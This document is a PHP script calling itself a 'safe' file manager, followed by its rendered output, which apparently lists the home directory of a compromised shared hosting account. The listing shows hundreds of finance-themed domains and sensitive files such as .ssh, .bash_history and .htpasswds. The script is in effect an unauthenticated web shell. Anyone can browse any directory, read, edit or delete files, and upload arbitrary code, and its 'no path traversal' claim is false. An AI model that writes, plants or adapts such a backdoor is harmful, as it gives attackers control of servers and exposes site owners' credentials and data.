ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ

PATH: home / lab2454c

<?php
/* =====================================================
   SAFE PHP FILE MANAGER
   - Anti 0 KB write
   - Safe edit / upload / delete / rename
   - No directory delete
   - No path traversal
===================================================== */

error_reporting(E_ALL);
ini_set('display_errors', 1);

/* ================= PATH ================= */
$cwd = getcwd();
if (isset($_GET['p'])) {
    $real = realpath($_GET['p']);
    if ($real !== false && is_dir($real)) {
        $cwd = $real;
    }
}

/* ================= BREADCRUMB ================= */
function nav(string $dir): string {
    $parts = explode(DIRECTORY_SEPARATOR, $dir);
    $path = '';
    $out  = [];

foreach ($parts as $p) {
        if ($p === '') continue;
        $path .= DIRECTORY_SEPARATOR . $p;
        $out[] = '<a href="?p=' . urlencode($path) . '">' . htmlspecialchars($p) . '</a>';
    }
    return implode(' / ', $out);
}

$msg = '';

/* ================= SAVE FILE (ANTI 0 KB) ================= */
if (isset($_POST['save'], $_POST['file'], $_POST['content'])) {

$file   = basename($_POST['file']);
    $target = $cwd . DIRECTORY_SEPARATOR . $file;

if (is_file($target) && is_writable($target)) {

$tmp = $target . '.tmp_' . uniqid('', true);
        $bytes = file_put_contents($tmp, $_POST['content'], LOCK_EX);

if ($bytes !== false && filesize($tmp) > 0) {
            rename($tmp, $target);
            $msg = 'File saved successfully.';
        } else {
            @unlink($tmp);
            $msg = 'Write failed. File NOT modified.';
        }
    } else {
        $msg = 'File not writable.';
    }
}

/* ================= UPLOAD ================= */
if (!empty($_FILES['upload']['name'])) {

if ($_FILES['upload']['error'] === UPLOAD_ERR_OK) {

$name = basename($_FILES['upload']['name']);
        $dest = $cwd . DIRECTORY_SEPARATOR . $name;

if (!file_exists($dest) && move_uploaded_file($_FILES['upload']['tmp_name'], $dest)) {
            $msg = 'Upload successful.';
        } else {
            $msg = 'Upload failed or file exists.';
        }
    } else {
        $msg = 'Upload error.';
    }
}

/* ================= DELETE FILE ================= */
if (isset($_POST['delete'], $_POST['file'])) {

$file   = basename($_POST['file']);
    $target = $cwd . DIRECTORY_SEPARATOR . $file;

if (is_file($target) && is_writable($target)) {
        unlink($target);
        $msg = 'File deleted successfully.';
    } else {
        $msg = 'File not deletable.';
    }
}

/* ================= RENAME FILE ================= */
if (isset($_POST['rename'], $_POST['old'], $_POST['new'])) {

$old = basename($_POST['old']);
    $new = basename($_POST['new']);

$oldPath = $cwd . DIRECTORY_SEPARATOR . $old;
    $newPath = $cwd . DIRECTORY_SEPARATOR . $new;

if ($new === '') {
        $msg = 'New filename cannot be empty.';
    } elseif (!is_file($oldPath)) {
        $msg = 'Source file not found.';
    } elseif (file_exists($newPath)) {
        $msg = 'Target filename already exists.';
    } elseif (rename($oldPath, $newPath)) {
        $msg = 'File renamed successfully.';
    } else {
        $msg = 'Rename failed.';
    }
}
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ</title>
<style>
body { background:#111;color:#eee;font-family:Arial;font-size:14px }
a { color:#6cf;text-decoration:none }
textarea,input { background:#222;color:#eee;border:1px solid #444 }
ul { list-style:none;padding-left:0 }
li { margin:6px 0 }
.msg { color:#9f9;margin:10px 0 }
.small { font-size:12px;color:#aaa }
</style>
</head>
<body>

<?php if ($msg): ?>
<div class="msg"><?= htmlspecialchars($msg); ?></div>
<?php endif; ?>

<hr>

<?php
/* ================= EDIT MODE ================= */
if (isset($_GET['e'])) {

$file = basename($_GET['e']);
    $path = $cwd . DIRECTORY_SEPARATOR . $file;

if (is_file($path) && is_readable($path)) {

$content = htmlspecialchars(file_get_contents($path));
        ?>
        <form method="post">
            <textarea name="content" rows="20" cols="100"><?= $content ?></textarea><br>
            <input type="hidden" name="file" value="<?= htmlspecialchars($file) ?>">
            <input type="submit" name="save" value="Save">
        </form>
        <hr>
        <?php
    }
}

/* ================= FILE LIST ================= */
$h = opendir($cwd);
echo '<ul>';

while (($i = readdir($h)) !== false) {

if ($i === '.') continue;
    $p = $cwd . DIRECTORY_SEPARATOR . $i;

if (is_dir($p)) {

echo '<li>[+] <a href="?p=' . urlencode($p) . '">' . htmlspecialchars($i) . '</a></li>';

} else {

echo '<li>[-] ' . htmlspecialchars($i) . '
        <a href="?e=' . urlencode($i) . '&p=' . urlencode($cwd) . '">[edit]</a>

<form method="post" style="display:inline"
            onsubmit="return confirm(\'Delete file ' . htmlspecialchars($i) . '?\')">
            <input type="hidden" name="file" value="' . htmlspecialchars($i) . '">
            <input type="submit" name="delete" value="delete">
        </form>
        </li>';
    }
}

closedir($h);
echo '</ul>';
?>

</body>
</html>

[+] ..
[+] .ssh
[+] cotexprotocol.com
[+] omvstudio.com
[+] kyotounitnotes.com
[+] vaxfi.com
[+] var
[+] crypthorize.org
[+] am.elementalrock.com
[+] caribbeanclimateneutralregistry.com
[+] ercabarterholding.com
[+] carbonbullion.com
[+] .subaccounts
[+] minit.com
[-] .pearrc [edit]
[+] kyc.datmont.com
[+] keyreum.com
[+] archswipe.com
[+] imbtrust.com
[+] igstin.org
[+] omvplay.com
[-] .lastlogin [edit]
[+] .cphorde
[+] perl5
[+] divinesaintbasseterre.com
[+] shop.elementalmill.com
[+] sovereignshore.com
[+] senetry.com
[+] ifsin.com
[+] public_html
[+] shakcoin.com
[+] .wp-cli
[+] gemspotmarket.com
[+] invest.equitablebarter.com
[+] londston.com
[+] worldcarboncapture.com
[+] atopec.com
[+] arcadiacircle.com
[+] argowells.com
[+] bin
[+] php
[+] nioch.com
[+] lordritzy.com
[+] etc
[+] access-logs
[+] crediteen.com
[+] credityork.com
[+] minersandcommoditytraders.com
[+] igpma.com
[+] caimexchange.com
[+] cashewinc.com
[+] cbcei.com
[-] .spamassassinenable [edit]
[+] veritserv.com
[+] sportsnovate.com
[+] shakalar.com
[+] wyntle.com
[+] www
[+] onemediaverse.com
[-] .bash_profile [edit]
[-] whsy.php [edit]
[+] amgholdingcompany.com
[+] aficb.com
[+] greencreditexchange.com
[+] .trash
[+] gemition.com
[+] financial.datmont.com
[+] dsbjewel.com
[+] tripvare.com
[+] mellogia.com
[+] mactbank.com
[+] kyotounitexchange.com
[+] cvrmarkets.com
[+] tmp
[+] veritserv.net
[+] westernclear.net
[+] dsbjewels.com
[-] climatefinancebank.com.zip [edit]
[+] 23rdbank.com
[+] sparxnovate.com
[+] mail
[+] glamwit.com
[+] elementalmill.com
[+] otgosports.com
[+] reelcode.com
[+] biocei.com
[+] mact34.com
[+] internationalmetaversebank.com
[+] cbmegroup.com
[+] elementalrefinery.com
[+] cashewpay.com
[+] gemsaq.com
[+] lmma.org
[+] ercabartercapital.com
[+] portude.com
[+] argowellsproperties.com
[+] .cpanel
[+] gemstockmarket.com
[+] costbloc.site
[+] budget.veritserv.com
[+] sow.veritserv.com
[+] banksafeone.com
[+] caimegroup.com
[+] beleci.com
[+] carbonbullion.net
[+] highnetrock.com
[+] chrisitanitybank.com
[+] environmentalassetexchange.com
[+] adenbic.com
[+] fcxpro.com
[+] .softaculous
[+] keebchat.com
[+] .spamassassin
[+] climateassettrade.com
[+] validatekey.com
[+] isaaclondston.com
[+] coshade.com
[+] geniopix.com
[+] cbfintrade.com
[+] omvse.com
[+] climatecontinental.com
[+] assetmontree.com
[+] sparxbank.com
[+] sportstude.com
[-] malware_scan_07-11.txt [edit]
[+] oneclimatestandard.com
[+] crypto.keyreum.com
[+] kyotounitnote.com
[+] .razor
[+] bancmils.com
[+] sothebankuab.com
[+] nationalclimatechangeregistry.com
[+] 23rdb.com
[+] credityorkgroup.com
[-] .bash_history [edit]
[+] carbonbullionmint.com
[+] securepaychip.com
[+] bullclimate.com
[+] tripvares.com
[+] incforce.com
[-] .contactemail [edit]
[+] africanforeignbank.com
[-] .wp-toolkit-identifier [edit]
[+] cbmindex.com
[+] carbonterminal.com
[+] nfsin.org
[+] shaksettle.com
[-] .bash_logout [edit]
[+] .koality
[+] gemcommodity.com
[+] futurescarbonexchange.com
[+] cfbinternational.com
[+] ifsin.org
[+] idenbic.com
[+] intermetaversebank.com
[+] datmont.com
[+] .htpasswds
[+] costbloc.com
[-] public_html.zip [edit]
[+] oneclimatestandards.com
[+] christianitybank.org
[+] elementalrock.com
[+] internationalminersbank.com
[+] sports.keyreum.com
[+] icuamaps.com
[+] payvory.com
[+] omvstudioentertainment.com
[+] icuamap.com
[+] crypthorize.com
[+] amghc.net
[+] argowell.com
[+] climatefinancebank.com
[+] spaxtac.com
[+] baas.elementalrock.com
[+] gemiton.com
[+] internationalcarbonregistry.com
[+] netxzero.com
[+] shakbase.com
[+] shakalar.org
[+] 23rdpay.com
[+] igsin.com
[+] .pki
[+] beleciano.com
[+] sports.sparxnovate.com
[+] logs
[-] .htaccess [edit]
[+] environmentalassetsexchange.com
[-] .spamassassinboxenable [edit]
[-] .bashrc [edit]
[+] kyotounits.com
[+] ssl
[+] incforce.net
[+] crypthorize.net
[+] worldcarboncapture.org
[+] hibiscard.com
[+] foremostcard.com
[+] dansact.com
[+] keyreum.org
[+] wordpress-backups
[+] softkinesis.com
[-] malware_scan-19-11-23.txt [edit]
[+] costinbulk.com
[+] bespoketrading.com
[+] public_ftp
[+] costbloc.net
[+] tudeflix.com
[+] invest.credityork.com
[+] omvstudios.com
[+] sparxbankgroup.com
[+] aficbgroup.com
[+] embaar.com
[+] africanforeignfinancialcredit.com
[+] 23rdbanking.com
[+] amgconsortium.com
[+] scostrade.com
[+] cashuw.com
[+] igstin.com
[+] equitablebarter.com
[+] bullionmils.com
[+] vaultchip.com
[+] nfsin.com
[+] foreclass.com
[+] westernclear.com
[+] keyreum.net
[+] archfort.com
[+] elementstal.com
[+] inctechhub.com
[+] erbarter.com
[+] kyotounit.com
[+] sothebry.softkinesis.com
[-] error_log [edit]
[+] equitablegold.com
[+] vkeycloud.com
[+] sparxnovate.net
[+] christianitybank.com
[+] carbonbullionmarketexchange.com
[+] .composer
[+] transferwit.elementalrock.com
[+] firstdigitalbank.com
[+] africanforeigninvestment.com
[+] whtcd.com
[+] bullionmills.com
[-] .viminfo [edit]
[+] africanforeigninvestmentcreditbenefits.com
[+] carbonmarketsgroup.com
[+] carbonbullionexchange.com
[+] firstdigital.com
[+] originalmediaverse.com
[+] invest.westernclear.com
[+] healthvalidate.com
[+] hibiscash.com
[+] isaacdaniel.com
[-] .myimunify_id [edit]
[+] isparxcloud.com
[+] argowellgroup.com
[-] .imunify_patch_id [edit]
[+] gce.elementalrock.com
[+] costbloc.org
[+] africanforeigncreditbenefits.com